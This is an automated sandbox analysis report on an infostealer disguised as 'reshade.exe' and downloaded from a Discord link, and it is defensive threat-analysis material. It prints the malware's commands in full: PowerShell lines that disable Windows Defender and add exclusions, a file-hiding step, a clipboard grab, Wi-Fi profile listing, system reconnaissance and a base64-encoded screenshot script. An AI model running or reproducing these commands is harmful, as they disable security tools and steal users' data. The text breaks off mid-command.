Analysis

  • max time kernel
    97s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 11:52

General

  • Target

    https://cdn.discordapp.com/attachments/1234958894225162311/1238820979413745685/reshade.exe?ex=6640ad71&is=663f5bf1&hm=e51dc315447a6523e4236d2351043ff9ad9363ef9c92eb0ee4848bac1ab9a542&

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 26 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 62 IoCs
  • Suspicious use of SendNotifyMessage 48 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1234958894225162311/1238820979413745685/reshade.exe?ex=6640ad71&is=663f5bf1&hm=e51dc315447a6523e4236d2351043ff9ad9363ef9c92eb0ee4848bac1ab9a542&
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4264
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff95bb2ab58,0x7ff95bb2ab68,0x7ff95bb2ab78
      2⤵
        PID:348
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:2
        2⤵
          PID:3752
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:8
          2⤵
            PID:4688
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2268 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:8
            2⤵
              PID:1492
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:1
              2⤵
                PID:5056
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:1
                2⤵
                  PID:1556
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4644 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:8
                  2⤵
                    PID:5020
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4656 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:8
                    2⤵
                      PID:1488
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4976 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:8
                      2⤵
                        PID:1124
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:8
                        2⤵
                          PID:2788
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:8
                          2⤵
                            PID:3736
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4024 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:8
                            2⤵
                              PID:2892
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4184 --field-trial-handle=1980,i,8981040780600020802,16539390273959314425,131072 /prefetch:8
                              2⤵
                                PID:3152
                              • C:\Users\Admin\Downloads\reshade.exe
                                "C:\Users\Admin\Downloads\reshade.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2412
                                • C:\Users\Admin\Downloads\reshade.exe
                                  "C:\Users\Admin\Downloads\reshade.exe"
                                  3⤵
                                  • Drops file in Drivers directory
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2880
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\reshade.exe'"
                                    4⤵
                                      PID:1448
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\reshade.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3672
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                      4⤵
                                        PID:3364
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2684
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                        4⤵
                                          PID:4416
                                          • C:\Windows\system32\tasklist.exe
                                            tasklist /FO LIST
                                            5⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3684
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          4⤵
                                            PID:2072
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              5⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4388
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                            4⤵
                                              PID:5336
                                              • C:\Windows\system32\reg.exe
                                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                5⤵
                                                  PID:5404
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                4⤵
                                                  PID:5452
                                                  • C:\Windows\system32\reg.exe
                                                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                    5⤵
                                                      PID:5640
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    4⤵
                                                      PID:5652
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        5⤵
                                                        • Detects videocard installed
                                                        PID:5704
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                      4⤵
                                                        PID:5768
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic path win32_VideoController get name
                                                          5⤵
                                                          • Detects videocard installed
                                                          PID:5824
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\reshade.exe""
                                                        4⤵
                                                          PID:5860
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib +h +s "C:\Users\Admin\Downloads\reshade.exe"
                                                            5⤵
                                                            • Views/modifies file attributes
                                                            PID:5160
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ ‍ .scr'"
                                                          4⤵
                                                            PID:5876
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍‎ ‍ .scr'
                                                              5⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5296
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            4⤵
                                                              PID:6024
                                                              • C:\Windows\system32\tasklist.exe
                                                                tasklist /FO LIST
                                                                5⤵
                                                                • Enumerates processes with tasklist
                                                                PID:5440
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                              4⤵
                                                                PID:6052
                                                                • C:\Windows\system32\tasklist.exe
                                                                  tasklist /FO LIST
                                                                  5⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:5476
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                4⤵
                                                                  PID:5352
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                    5⤵
                                                                      PID:5840
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                    4⤵
                                                                      PID:5500
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-Clipboard
                                                                        5⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:5868
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                      4⤵
                                                                        PID:5536
                                                                        • C:\Windows\system32\tasklist.exe
                                                                          tasklist /FO LIST
                                                                          5⤵
                                                                          • Enumerates processes with tasklist
                                                                          PID:5932
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                        4⤵
                                                                          PID:5224
                                                                          • C:\Windows\system32\tree.com
                                                                            tree /A /F
                                                                            5⤵
                                                                              PID:6084
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                            4⤵
                                                                              PID:5212
                                                                              • C:\Windows\system32\netsh.exe
                                                                                netsh wlan show profile
                                                                                5⤵
                                                                                  PID:6096
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                4⤵
                                                                                  PID:5632
                                                                                  • C:\Windows\system32\systeminfo.exe
                                                                                    systeminfo
                                                                                    5⤵
                                                                                    • Gathers system information
                                                                                    PID:5896
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                  4⤵
                                                                                    PID:4420
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                      5⤵
                                                                                        PID:5924
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                      4⤵
                                                                                        PID:5616
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHM